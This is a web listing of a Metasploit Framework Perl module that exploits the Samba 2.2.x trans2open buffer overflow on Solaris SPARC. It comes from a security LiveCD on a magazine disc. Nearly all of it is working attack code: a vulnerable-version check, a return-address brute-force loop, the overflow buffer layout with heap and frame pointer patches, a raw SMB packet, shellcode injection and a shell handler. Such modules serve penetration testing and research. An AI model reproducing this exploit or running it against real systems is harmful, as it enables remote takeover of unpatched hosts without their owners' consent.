home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / samba_trans2open_solsparc.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  6.8 KB  |  258 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::samba_trans2open_solsparc;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14. use Pex::SMB;
  15. use IO::Socket;
  16.  
  17. my $advanced = { };
  18.  
  19. my $info =
  20.   {
  21.     'Name'    => 'Samba trans2open Overflow (Solaris SPARC)',
  22.     'Version' => '$Revision: 1.7 $',
  23.     'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
  24.  
  25.     'Arch'  => [ 'sparc' ],
  26.     'OS'    => [ 'solaris' ],
  27.     'Priv'  => 1,
  28.  
  29.     'UserOpts'  =>
  30.       {
  31.         'RHOST' => [1, 'ADDR', 'The target address'],
  32.         'RPORT' => [1, 'PORT', 'The samba port', 139],
  33.         'SRET', => [0, 'DATA', 'Use specified return address'],
  34.         'DEBUG' => [0, 'BOOL', 'Enable debugging mode'],
  35.       },
  36.  
  37.     'Payload' =>
  38.       {
  39.         'Space'     => 1024,
  40.         'BadChars'  => "\x00",
  41.         'MinNops'   => 512,
  42.         'Keys'      => ['+findsock'],
  43.       },
  44.  
  45.     'Description'  => Pex::Text::Freeform(qq{
  46.         This exploits the buffer overflow found in Samba versions
  47.         2.2.0 to 2.2.8. This particular module is capable of
  48.         exploiting the flaw on Solaris SPARC systems that do not
  49.         have the noexec stack option set. Big thanks to MC and
  50.         valsmith for resolving a problem with the beta version
  51.         of this module.
  52. }),
  53.  
  54.     'Refs'  =>
  55.       [
  56.         ['OSVDB', '4469'],
  57.         ['URL',   'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
  58.         ['MIL',   '55'],
  59.       ],
  60.  
  61.     'Targets' =>
  62.       [
  63.         ["Samba 2.2.x Solaris 9 (sun4u) ",   0xffbffaf0, 0xffbfa000, 128, 0xffbffffc],
  64.         ["Samba 2.2.x Solaris 7/8 (sun4u) ", 0xffbefaf0, 0xffbea000, 128, 0xffbefffc],
  65.       ],
  66.  
  67.     'Keys'  => ['samba'],
  68.  
  69.     'DisclosureDate' => 'Apr 7 2003',
  70.   };
  71.  
  72. sub new {
  73.     my $class = shift;
  74.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  75.     return($self);
  76. }
  77.  
  78. sub Check {
  79.     my $self = shift;
  80.     my $target_host = $self->GetVar('RHOST');
  81.     my $target_port = $self->GetVar('RPORT');
  82.  
  83.     my $s = Msf::Socket::Tcp->new
  84.       (
  85.         'PeerAddr' => $target_host,
  86.         'PeerPort' => $target_port,
  87.         'LocalPort' => $self->GetVar('CPORT'),
  88.       );
  89.     if ($s->IsError) {
  90.         $self->PrintLine("[*] Error creating socket: " . $s->GetError);
  91.         return $self->CheckCode('Connect');
  92.     }
  93.  
  94.     my $x = Pex::SMB->new({ 'Socket' => $s });
  95.  
  96.     $x->SMBNegotiate();
  97.     if ($x->Error) {
  98.         $self->PrintLine("[*] Error negotiating protocol");
  99.         return $self->CheckCode('Generic');
  100.     }
  101.  
  102.     $x->SMBSessionSetup();
  103.     if ($x->Error) {
  104.         $self->PrintLine("[*] Error setting up session");
  105.         return $self->CheckCode('Generic');
  106.     }
  107.  
  108.     my $version = $x->PeerNativeLM();
  109.     $s->Close;
  110.  
  111.     if (! $version) {
  112.         $self->PrintLine("[*] Could not determine the remote Samba version");
  113.         return $self->CheckCode('Generic');
  114.     }
  115.  
  116.     $self->PrintDebugLine(1, 'LanMan: '.$version);
  117.     $self->PrintDebugLine(1, ' OpSys: '.$x->PeerNativeOS);
  118.  
  119.     if ($version =~ /samba\s+([01]|2\.0|2\.2\.[0-7]|2\.2\.8$)/i) {
  120.         $self->PrintLine("[*] Target seems to running vulnerable version: $version");
  121.         return $self->CheckCode('Appears');
  122.     }
  123.  
  124.     $self->PrintLine("[*] Target does not seem to be vulnerable: $version");
  125.     return $self->CheckCode('Safe');
  126. }
  127.  
  128. sub Exploit {
  129.     my $self = shift;
  130.     my $target_host = $self->GetVar('RHOST');
  131.     my $target_port = $self->GetVar('RPORT');
  132.     my $target_idx  = $self->GetVar('TARGET');
  133.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  134.     my $target      = $self->Targets->[$target_idx];
  135.  
  136.     $self->PrintLine("[*] Starting bruteforce mode for target ".$target->[0]);
  137.  
  138.     if ($self->GetVar('SRET')) {
  139.         my $ret = eval($self->GetVar('SRET')) + 0;
  140.         $target->[1] = $target->[2] = $ret;
  141.     }
  142.  
  143.     my $curr_ret;
  144.     for (
  145.         $curr_ret  = $target->[1];
  146.         $curr_ret >= $target->[2];
  147.         $curr_ret -= $target->[3]
  148.       )
  149.     {
  150.  
  151.         my $s = Msf::Socket::Tcp->new
  152.           (
  153.             'PeerAddr'  => $target_host,
  154.             'PeerPort'  => $target_port,
  155.             'LocalPort' => $self->GetVar('CPORT'),
  156.             'SSL'       => $self->GetVar('SSL'),
  157.           );
  158.         if ($s->IsError) {
  159.             $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  160.             return;
  161.         }
  162.  
  163.         my $x = Pex::SMB->new({ 'Socket' => $s });
  164.  
  165.         $x->SMBNegotiate();
  166.         if ($x->Error) {
  167.             $self->PrintLine("[*] Error negotiating protocol");
  168.             return;
  169.         }
  170.  
  171.         $x->SMBSessionSetup();
  172.         if ($x->Error) {
  173.             $self->PrintLine("[*] Error setting up session");
  174.             return;
  175.         }
  176.  
  177.         $x->SMBTConnect("\\\\127.0.0.1\\IPC\$");
  178.         if ($x->Error) {
  179.             $self->PrintLine("[*] Error connecting to IPC");
  180.             return;
  181.         }
  182.  
  183.         ##
  184.         # The obstacle course:
  185.         #     outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize);
  186.         #     smb_dump(smb_fn_name(type), 0, outbuf, outsize);
  187.         #     return(outsize);
  188.         ##
  189.  
  190.         # This value *must* be 1988 to allow findrecv shellcode to work
  191.         my $pattern = Pex::Text::EnglishText(1988);
  192.  
  193.         ##
  194.         # This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
  195.         #
  196.         # Patch the overwritten heap pointers
  197.         # substr($pattern, 1159, 4, pack('N', $target->[4]));
  198.         # substr($pattern, 1163, 4, pack('N', $target->[4]));
  199.         #
  200.         # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
  201.         # substr($pattern, 1195, 4, pack('N', 0xffffffff));
  202.         #
  203.         # Fix the frame pointer (need to check for null in address)
  204.         # substr($pattern, 1243, 4, pack('N', $target->[3]-64));
  205.         #
  206.         # Finally set the return address
  207.         # substr($pattern, 1247, 4, pack('N', $curr_ret));
  208.         ##
  209.  
  210.         ##
  211.         # This method is more reliable against a wider range of targets
  212.         ##
  213.  
  214.         # Local variable pointer patches for early versions of 2.2.x
  215.         substr($pattern, 1103, 36, pack('N', $target->[4] - 1024) x 9);
  216.  
  217.         # Overwrite heap pointers with a ptr to NULL at the top of the stack
  218.         substr($pattern, 1139, 40, pack('N', $target->[4]) x 10);
  219.  
  220.         # Patch the type index into the smb_messages[] array...
  221.         # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
  222.         substr($pattern, 1179, 20, pack('N', 0xffffffff) x 5);
  223.  
  224.         # This stream covers the framepointer and the return address
  225.         substr($pattern, 1199, 400, pack('N', $curr_ret) x 100);
  226.  
  227.         # Stuff the shellcode into the request
  228.         substr($pattern, 3, length($shellcode), $shellcode);
  229.  
  230.         my $Trans =
  231.           "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
  232.           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
  233.           "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
  234.           "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
  235.           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
  236.           "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90";
  237.  
  238.         my $Overflow = $Trans . $pattern;
  239.         $self->PrintLine(sprintf("[*] Trying return address 0x%.8x...", $curr_ret, length($Overflow)));
  240.  
  241.         if ($self->GetVar('DEBUG'))
  242.         {
  243.             print STDERR "[*] Press enter to send overflow string...\n";
  244.             <STDIN>;
  245.         }
  246.  
  247.         $s->Send($Overflow);
  248.  
  249.         # handle client side of shellcode
  250.         $self->Handler($s->Socket);
  251.  
  252.         $s->Close();
  253.         undef($s);
  254.     }
  255. }
  256.  
  257. 1;
  258.